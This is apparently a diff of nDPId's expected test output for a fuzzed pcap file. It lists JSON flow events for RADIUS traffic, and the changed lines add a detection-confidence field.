-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"flow_datalink":1,"flow_max_packets":3}
-00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1528996996259,"flow_last_seen":1528997833636,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":46496,"flow_avg_l4_payload_len":438,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1528996996259,"flow_last_seen":1528997833636,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":46496,"flow_avg_l4_payload_len":438,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00598{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997867542,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1528997867612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528997867612,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBqNAAPsRTmPG4hk1CgxAHgcUchQAkRggC4IAiUKdIcJOOZHCxHzP96o9900BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZy4gNWIyMvo3Y2YvYjA6OWY64mE6NGE6MGU6N2UvMmgzTw4BAAAMFwwAAAwBf\/xQEmqru8HGcXlY8CXWo9RL+sk="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00672{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1528996996259,"flow_last_seen":1528997867808,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":48018,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00698{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1528996996259,"flow_last_seen":1528997867808,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":48018,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997988607,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
